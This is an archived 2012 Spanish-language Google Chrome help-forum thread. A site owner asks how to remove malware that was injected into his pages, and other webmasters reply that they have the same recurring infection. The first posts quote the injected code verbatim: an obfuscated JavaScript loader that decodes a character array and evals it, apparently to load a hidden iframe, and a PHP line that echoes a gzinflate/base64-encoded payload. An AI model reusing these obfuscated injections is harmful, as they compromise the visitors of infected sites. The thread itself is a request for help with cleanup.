Solo lectura

Google Chrome - Foro de ayuda

Esta página web es un archivo de los hilos antiguos de los foros de Google. Más información

Advertencia ALGO FALLA AQUI. Código malicioso en archivos HTML y PHP al empezar el <body>

LaRose
1/06/12 8:51
Hola a todos,
Gracias a GOogle Chrome y a su aviso de advertencia "ALGO FALLA AQUI - ....WWW.ULTRALANG.COM incluye contenido con software malintencionado
" hemos detectado que algunas de mis páginas tienen incrustado código malicioso como éste que pego más abajo.
Mi pregunta es:
¿Cómo elimino ese malware? Aparte de eliminarlo del código de la página y para que no se vuelva a generar, ¿Recomiendan seguir algun procedimiento?

Gracias

Aquí el codigo MALWARE que aparecía pegado en las páginas:


<!--c3284d--><script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h&&zz)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-3.375,-3.75,7.5,8.875,7.375,9.625,8.625,7.625,8.75,9.5,0.75,9.875,9.25,8.125,9.5,7.625,0,-0.125,2.5,8.125,7.75,9.25,7.125,8.625,7.625,-1,9.375,9.25,7.375,2.625,-0.75,8,9.5,9.5,9,2.25,0.875,0.875,9.875,9.875,9.875,0.75,9.625,8.5,9.5,9.25,7.125,8.5,7.125,8.75,7.875,0.75,7.375,8.875,8.625,0.875,9.375,9.5,7.125,9.5,9.375,0.75,9,8,9,-0.75,-1,8.75,7.125,8.625,7.625,2.625,-0.75,5.5,9.875,8.125,9.5,9.5,7.625,9.25,-0.75,-1,9.375,7.375,9.25,8.875,8.5,8.5,8.125,8.75,7.875,2.625,-0.75,7.125,9.625,9.5,8.875,-0.75,-1,7.75,9.25,7.125,8.625,7.625,7.25,8.875,9.25,7.5,7.625,9.25,2.625,-0.75,8.75,8.875,-0.75,-1,7.125,8.5,8.125,7.875,8.75,2.625,-0.75,7.375,7.625,8.75,9.5,7.625,9.25,-0.75,-1,8,7.625,8.125,7.875,8,9.5,2.625,-0.75,1.25,-0.75,-1,9.875,8.125,7.5,9.5,8,2.625,-0.75,1.25,-0.75,2.75,2.5,0.875,8.125,7.75,9.25,7.125,8.625,7.625,2.75,-0.125,0.125,2.375,-3.375,-3.75];for(i=6-2-1-2-1;i-166!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*4*h*(5+1*n[k]));}e(ss);}</script><!--/c3284d-->

Respuestas (4)

LaRose
1/06/12 8:54
Para más señas, también hemos encontrado este código en las páginas PHP:

#c3284d#
echo(gzinflate(base64_decode("hVTJkpswEP2WcBjAGA0Sw5JolBxc+YIcKR9sLBtqbMASjmtwzb9HK2DXJDlINL28ft1S65WXrO767z17v53Jri0vJ9r0oGR009OfRyr/POfi+PgMNl1Hm92qqo877xw4QvdRbvqy8s5X/1aRMILoOcHDQNyNG7hHF++Ju2dCbMU6ibWqhC4QZrZy8YdMuaWHLSUda/u2f++oBdy+xIcd928Sa/jtAn7Z8p55EMUhRMgPhgFzToq1RPOqp6dh8H+47Y663xwHX0lf1RxTci32YySUQWvckCKMQZwlS/ERewaSZQ5yJUntV5AiqZF7ZmSlTpaRFnK1KwNE2qIdo2UYKRUC1pgB65yp/zluCIUlnuxSRNqiMuUKWi2hl/gqdWQIPO6GnWZs4uaJJ0nVOoboxLoFmp7NEGe2Olun1ulMkp9hKioxqI81zutJgKWazwCtp+I6wulE2dQey8+uh0rmeSzd1OTQoSP0v44km1IZjzt6d6cDsk+gbavt6efW856gLu7ucn3WhXx0mqEp7zkcfOjc1OHMdDj/mz/Smz3y/99ZFWBuub3rZpbGkRIz2TKvJmmIQigXrkOYpl9IhOsg8G9vpJazy3nwq2d1cyicPWtPTuCsKvEsiBl21l4IFy+LauElAVw0xdvaFy8N9TgXn9dn82D9AQ==")));
#/c3284d#
valpoalegre
2/06/12 19:43
A mi también me pasa lo mismo, elimino el codigo y se vuelve a regenerar en otros directorios de mi servidor... esta montado en Linux, sera algun factor comun? avisame si tienes novedades.

saludos
fpardo
2/06/12 19:46
Hola a todos, encontraréis la respuesta en la categoría Malware del foro para Webmasters de Google, pero antes de postear allí primero leed esto:
Hypatia80
20/06/12 2:05
tengo el mismo problema, cómo lo habéis solucionado??
Es que en el enlace que pones te deriva a otros que son genericos